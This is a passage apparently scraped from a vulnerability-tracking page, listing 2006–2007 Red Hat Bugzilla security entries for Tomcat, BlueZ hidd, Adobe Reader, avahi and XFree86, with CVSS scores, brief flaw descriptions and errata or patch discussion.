of these are minor severity, all need triaging:
http://tomcat.apache.org/security-4.html
Information disclosure CVE-2005-3164
Information disclosure CVE-2005-2090
Directory traversal CVE-2007-0450
Cross-site scripting CVE-2007-1358
Cross-site scripting CVE-2006-7196
Directory listing CVE-2006-3835
Cross-site scripting CVE-2005-4838
Denial of service CVE-2005-3510
Denial of service CVE-2003-0866
Information disclosure CVE-2002-2006
Discussion:
closing; Stronghold has reached end of life.
Bugzilla
CVE-2006-6899 Bluetooth HID key events injection flaw
bugzilla·2007-02-02·CVSS 5.4
CVE-2006-6899 [MEDIUM] CVE-2006-6899 Bluetooth HID key events injection flaw
The hidd allows remote attackers to inject keyboard or mouse events via
unprotected L2CAP PSM 17 and 19. All versions before bluez-utils-2.23 are
affected. The hidd service must be activated to exploit this vulnerability.
Discussion:
An advisory has been issued which should help the problem
described in this bug report. This report is therefore being
closed with a resolution of ERRATA. For more information
on the solution and/or where to find the updated files,
please follow the link below. You may reopen this bug report
if the solution does not work for you.
http://rhn.redhat.com/errata/RHSA-2007-0065.html
Bugzilla
CVE-2006-5857 Multiple Acrobat vulnerabilities (CVE-2007-0045 CVE-2007-0046)
bugzilla·2007-01-11·CVSS 9.3
CVE-2006-5857 [CRITICAL] CVE-2006-5857 Multiple Acrobat vulnerabilities (CVE-2007-0045 CVE-2007-0046)
Adobe informed us of several security vulnerabilities in Adobe Reader 7.0.8 and
earlier. They are releasing Adobe Reader 7.0.9 which fixes these flaws.
Discussion:
Please note that at this time we do not have an update for Adobe Acrobat Reader
on Red Hat Enterprise Linux 3. This is because the binaries supplied by Adobe
now rely on newer versions of libraries than were shipped with Red Hat
Enterprise Linux 3. We are currently working through possible solutions to this
problem.
---
An advisory has been issued which should help the problem
described in this bug report. This report is therefore being
closed with a resolution of ERRATA. For more information
on the solution and/or where to find the updated files,
Bugzilla
CVE-2006-6870 Maliciously crafted packet can DoS avahi daemon
bugzilla·2007-01-07·CVSS 5.0
CVE-2006-6870 [MEDIUM] CVE-2006-6870 Maliciously crafted packet can DoS avahi daemon
+++ This bug was initially created as a clone of Bug #221440 +++
+++ This bug was initially created as a clone of Bug #221439 +++
Description of problem:
Malformed compressed packet can trigger an endless loop
consuming 100% of cpu time upon its reception.
Version-Release number of selected component (if applicable):
FC5 (0.6.11), FC6 (0.6.15), RHEL5 (0.6.15)
Steps to Reproduce:
No reproducer available.
-- Additional comment from [email protected] on 2007-01-04 12:39 EST --
Created an attachment (id=144823)
Upstream patch for avahi Ticket #84 bug
Discussion:
This issue should be resolved in RAWHIDE version (avahi-0.6.16-1.fc7)
Bugzilla
CVE-2006-6870 Maliciously crafted packet can DoS avahi daemon
bugzilla·2007-01-06·CVSS 5.0
CVE-2006-6870 [MEDIUM] CVE-2006-6870 Maliciously crafted packet can DoS avahi daemon
+++ This bug was initially created as a clone of Bug #221440 +++
+++ This bug was initially created as a clone of Bug #221439 +++
Description of problem:
Malformed compressed packet can trigger an endless loop
consuming 100% of cpu time upon its reception.
Version-Release number of selected component (if applicable):
FC5 (0.6.11), FC6 (0.6.15), RHEL5 (0.6.15)
Steps to Reproduce:
No reproducer available.
-- Additional comment from [email protected] on 2007-01-04 12:39 EST --
Created an attachment (id=144823)
Upstream patch for avahi Ticket #84 bug
Discussion:
Patch resolving this bug was applied in avahi-0.6.11-3.fc5.
Bugzilla
CVE-2006-5857 Multiple Acrobat vulnerabilities (CVE-2007-0045 CVE-2007-0046)
bugzilla·2007-01-05·CVSS 9.3
CVE-2006-5857 [CRITICAL] CVE-2006-5857 Multiple Acrobat vulnerabilities (CVE-2007-0045 CVE-2007-0046)
Adobe informed us of several security vulnerabilities in Adobe Reader 7.0.8 and
earlier. They are releasing Adobe Reader 7.0.9 which fixes these flaws.
Discussion:
These flaws also affect the Adobe Reader shipped with RHEL3.
---
Lifting embargo:
http://www.adobe.com/support/security/bulletins/apsb07-01.html
---
Please note that at this time we do not have an update for Adobe Acrobat Reader
on Red Hat Enterprise Linux 3. This is because the binaries supplied by Adobe
now rely on newer versions of libraries than were shipped with Red Hat
Enterprise Linux 3. We are currently working through possible solutions to this
problem.
---
An advisory has been issued which should help the problem
described in this bug
Bugzilla
CVE-2006-6101 Multiple XFree86 integer overflows (CVE-2006-6102, CVE-2006-6103)
bugzilla·2006-12-07·CVSS 6.6
CVE-2006-6101 [MEDIUM] CVE-2006-6101 Multiple XFree86 integer overflows (CVE-2006-6102, CVE-2006-6103)
iDefense reported several integer overflow flaws in the XFree86 server source.
These flaws may allow a local user to leverage these flaws to become root.
Discussion:
These flaws also affect RHEL2.1
---
Created attachment 143094
Upstream patch
---
Built as XFree86-4.3.0-114.EL for RHEL3.
RHEL 2.1 is waiting for beehive to wake up.
---
XFree86-4.1.0-78.EL for RHEL 2.1
---
correction, -115 for RHEL3.
---
These issues are public:
http://lists.freedesktop.org/archives/xorg-announce/2007-January/000235.html
---
An advisory has been issued which should help the problem
described in this bug report. This report is therefore being
closed with a resolution of ERRATA. For more information
on the solution a
2007-04-12
Published